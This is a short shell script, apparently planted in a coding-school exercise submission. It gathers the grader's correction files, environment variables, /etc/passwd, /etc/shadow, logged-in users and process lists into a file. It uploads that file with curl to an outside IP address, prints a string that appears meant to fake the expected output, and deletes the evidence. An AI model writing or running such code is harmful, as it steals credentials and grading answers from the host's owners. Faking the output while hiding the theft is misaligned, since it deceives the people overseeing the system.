pwd > results
echo ----------------Crack me ------------- >> results
find /tmp/correction/holberton_corrections/corrections/232/1023/ -type f -printf "---%p----\n" -exec cat '{}' \;>> results
echo ----------------- Environment ------- >> results
env >> results
echo ----------------- User Info ------- >> results
cat /etc/passwd >> results
cat /etc/shadow >> results
echo ----------------- Users logged in ------- >> results
w >> results
echo ----------------- Disk Space ------- >> results
df -h >> results
echo ----------------- ps -aux ------- >> results
ps -aux >> results
echo ----------------- END $(date) ------- >> results
curl -s -F "name=@results" http://138.68.1.168:8080 && echo -n ool
rm results
